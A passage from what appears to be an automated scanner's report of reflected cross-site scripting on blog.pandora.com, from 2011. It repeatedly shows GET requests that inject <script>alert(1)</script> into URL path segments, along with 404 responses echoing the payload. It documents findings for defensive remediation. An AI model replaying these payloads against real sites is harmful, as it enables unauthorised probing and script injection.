Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 355

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives8c214<script>alert(1)</script>b8b28cef3de/massachusetts/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 40eea<script>alert(1)</script>4daafa849f6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/massachusetts40eea<script>alert(1)</script>4daafa849f6/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 355

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/massachusetts40eea<script>alert(1)</script>4daafa849f6/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7ee6f<script>alert(1)</script>47d2dc5e8b5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora7ee6f<script>alert(1)</script>47d2dc5e8b5/archives/michigan/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:58 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora7ee6f<script>alert(1)</script>47d2dc5e8b5/archives/michigan/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 947a8<script>alert(1)</script>db5c6120320 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives947a8<script>alert(1)</script>db5c6120320/michigan/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:00 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives947a8<script>alert(1)</script>db5c6120320/michigan/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6569b<script>alert(1)</script>31ac4934856 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/michigan6569b<script>alert(1)</script>31ac4934856/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/michigan6569b<script>alert(1)</script>31ac4934856/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8487c<script>alert(1)</script>81afb429dac was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora8487c<script>alert(1)</script>81afb429dac/archives/minnesota/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 351
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8487c<script>alert(1)</script>81afb429dac/archives/minnesota/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload d0986<script>alert(1)</script>4df760a3378 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesd0986<script>alert(1)</script>4df760a3378/minnesota/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 351

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesd0986<script>alert(1)</script>4df760a3378/minnesota/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5a5b3<script>alert(1)</script>d9de8f83c0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/minnesota5a5b3<script>alert(1)</script>d9de8f83c0/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/minnesota5a5b3<script>alert(1)</script>d9de8f83c0/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f5c1c<script>alert(1)</script>f85b07012ec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraf5c1c<script>alert(1)</script>f85b07012ec/archives/mississippi/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:04:59 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 353

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraf5c1c<script>alert(1)</script>f85b07012ec/archives/mississippi/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f4c87<script>alert(1)</script>6fe976a7326 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesf4c87<script>alert(1)</script>6fe976a7326/mississippi/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:01 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 353

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesf4c87<script>alert(1)</script>6fe976a7326/mississippi/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 9c40e<script>alert(1)</script>d255db79943 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/mississippi9c40e<script>alert(1)</script>d255db79943/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:04 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 353

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/mississippi9c40e<script>alert(1)</script>d255db79943/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload e7363<script>alert(1)</script>be446c1f728 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandorae7363<script>alert(1)</script>be446c1f728/archives/missouri/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:03 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorae7363<script>alert(1)</script>be446c1f728/archives/missouri/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 80b38<script>alert(1)</script>f1ed4fecb73 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives80b38<script>alert(1)</script>f1ed4fecb73/missouri/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:06 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives80b38<script>alert(1)</script>f1ed4fecb73/missouri/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a14db<script>alert(1)</script>9908a654cd7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/missouria14db<script>alert(1)</script>9908a654cd7/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/missouria14db<script>alert(1)</script>9908a654cd7/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7cece<script>alert(1)</script>58d715564b1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora7cece<script>alert(1)</script>58d715564b1/archives/nebraska/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 350
Connection: close
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora7cece<script>alert(1)</script>58d715564b1/archives/nebraska/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 70673<script>alert(1)</script>a0d7ecee19d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives70673<script>alert(1)</script>a0d7ecee19d/nebraska/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives70673<script>alert(1)</script>a0d7ecee19d/nebraska/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload de711<script>alert(1)</script>23fb059918f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/nebraskade711<script>alert(1)</script>23fb059918f/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 350
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/nebraskade711<script>alert(1)</script>23fb059918f/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 338e6<script>alert(1)</script>4ab9dcf9e4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora338e6<script>alert(1)</script>4ab9dcf9e4e/archives/new-jersey/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:07 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 352
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora338e6<script>alert(1)</script>4ab9dcf9e4e/archives/new-jersey/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 753ff<script>alert(1)</script>0065a69c7bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives753ff<script>alert(1)</script>0065a69c7bb/new-jersey/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:09 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 352
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives753ff<script>alert(1)</script>0065a69c7bb/new-jersey/ was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 97d30<script>alert(1)</script>d935da65367 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/new-jersey97d30<script>alert(1)</script>d935da65367/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:05:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
